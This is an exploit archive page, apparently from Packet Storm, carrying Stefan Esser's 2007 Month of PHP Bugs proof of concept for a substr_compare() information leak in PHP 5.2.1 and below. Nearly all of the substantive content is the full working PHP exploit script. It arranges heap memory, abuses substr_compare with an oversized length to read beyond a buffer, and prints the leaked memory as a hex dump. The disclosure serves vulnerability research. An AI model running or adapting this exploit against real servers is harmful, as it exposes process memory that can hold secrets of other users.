MOPB-substr.txt

MOPB-substr.txt: Posted Mar 20, 2007; Authored by Stefan Esser | Site hardened-php.net; Month of PHP Bugs - PHP versions 5.2.1 and below substr_compare() information leak exploit.; tags | exploit, php; SHA-256 | 13745c954f00bdb48fb1188def122aa897683e1d76714bd699ea886c5890b4e8; Download | Favorite | View

MOPB-substr.txt

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //        PHP 5 - substr_compare Information Leak Vulnerability       //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  $sizeofHashtable = 39;
  $maxlong = 0x7fffffff;
  if (is_int($maxlong+1)) {
    $sizeofHashtable = 67;
    $maxlong = 0x7fffffffffffffff;
  }

  $memdump = str_repeat("A", 4096);
  for ($i=0; $i<40; $i++) $d[] = array();
  unset($d[20]);
  $x = str_repeat("A", $sizeofHashtable);
  
  // If the libc memcmp leaks the information use it
  // otherwise we only get a case insensitive memdump
  $b = substr_compare(chr(65),chr(0),0,1,false) != 65;

  for ($i=0; $i<4096; $i++) {
    $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
    $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
    if ($y-$Y == 1 || $Y-$y==1){
      $y = chr($y);
      if ($b && strtoupper($y)!=$y) {
        if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
          $y = strtoupper($y);
        }
      }
      $memdump[$i] = $y;
    } else {
      $memdump[$i] = chr(0);
    }
  }
  
  echo "memdump\n---------\n\n";
  
  for ($b=0; $b<strlen($memdump); $b+=16) {
    printf("%08x: ", $b);
    for ($i=0; $i<16; $i++) {
      printf ("%02x ", ord($memdump[$b+$i]));
    }
    for ($i=0; $i<16; $i++) {
      $c = ord($memdump[$b+$i]);
      if ($c >= 127 || $c < 32) {
        $c = ord(".");
      }
      printf ("%c", $c);
    }
    printf("\n");
  }

?>

Top Authors In Last 30 Days

Red Hat 248 files
Ubuntu 91 files
indoushka 58 files
Jasper Nota 25 files
Willem Westerhof 19 files
Gentoo 13 files
Debian 13 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,087)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,536)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,612)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,441)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,727)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

MOPB-substr.txt

MOPB-substr.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MOPB-substr.txt

Share This

MOPB-substr.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems